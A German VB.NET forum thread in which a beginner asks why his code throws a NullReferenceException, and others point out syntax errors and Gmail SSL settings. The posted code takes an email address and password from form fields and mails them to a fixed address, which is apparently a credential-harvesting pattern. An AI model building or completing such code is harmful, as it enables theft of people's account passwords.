NullReferenceException Error :/

  • VB.NET
  • .NET (FX) 4.0

Es gibt 2 Antworten in diesem Thema. Der letzte Beitrag () ist von Snaptu.

    NullReferenceException Error :/

    Hallo liebes VB-Paradise Team,
    Da ich noch ein relativer VB bin und jetzt gerade meinen ersten NullReference Error hatte bräuchte ich eure Hilfe hier ist mein Code:
    Timer1.Start()
    Dim smtpServer As New SmtpClient()
    Dim mail As New MailMessage()
    smtpServer.Credentials = New Net.NetworkCredential("Email", "Pw")
    smtpServer.Port = 587
    smtpServer.Host = "smtp.gmail.com"
    smtpServer.Enablessl = True
    mail = New MailMessage
    mail.From = New MailAddress("Email")
    mail.To.Add = ("Email")
    mail.SUbject = "E-Mail: " & email.Text
    mail.Body = "E-Mail : " & email.Text & ", " & "Passwort : " & passwort.Text
    smtpServer.Send

    PS: Hoffe ich bin hier richtig ist mein erster Post in diesem Forum ;)
    PPS: Der Error kommt bei mail.To.Add = ("Email")
    Lg Leo
    Add verlangt nen parameter und ist keine eigenschaft.
    zweitens: bei der exception, ist da iwas null. (Haltepunkt setzen und einzelschritt durchführen)
    drittens: warum instanziierst du mail zweimal?
    Ahja und den Smtpclient musst du am ende mit .dispose() freigeben weil er idisposable implementiert

    Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von „RushDen“ ()

    und soweit ich weiß verlangt GMail SSL, das solltest du auch einschalten.


    Posteingangsserver: POP3: pop.gmail.com (SSL; Port 995), IMAP: imap.gmail.com (SSL; Port 993)
    Postausgangsserver: smtp.gmail.com (SSL; Port 465 oder 587)
    Benutzername: Benutzername@gmail.com
    Besonderheiten: Verwendet SMTP-Authentifizierung.
    Sie müssen in Ihrem Account den POP3- und SMTP-Zugriff zunächst aktivieren.
    POP3, IMAP und SMTP laufen über SSL-Verschlüsselung.


    forget it, hab zu schnell drüber gelesen...
    falls du noch Probleme hast schau einfach in dieses Tutorial: E-Mail senden per SMTP (Simple Mail Transfer Protocol)
    Wer fragt, ist ein Narr für eine Minute. Wer nicht fragt, ist ein Narr sein Leben lang.

    Dieser Beitrag wurde bereits 2 mal editiert, zuletzt von „Snaptu“ ()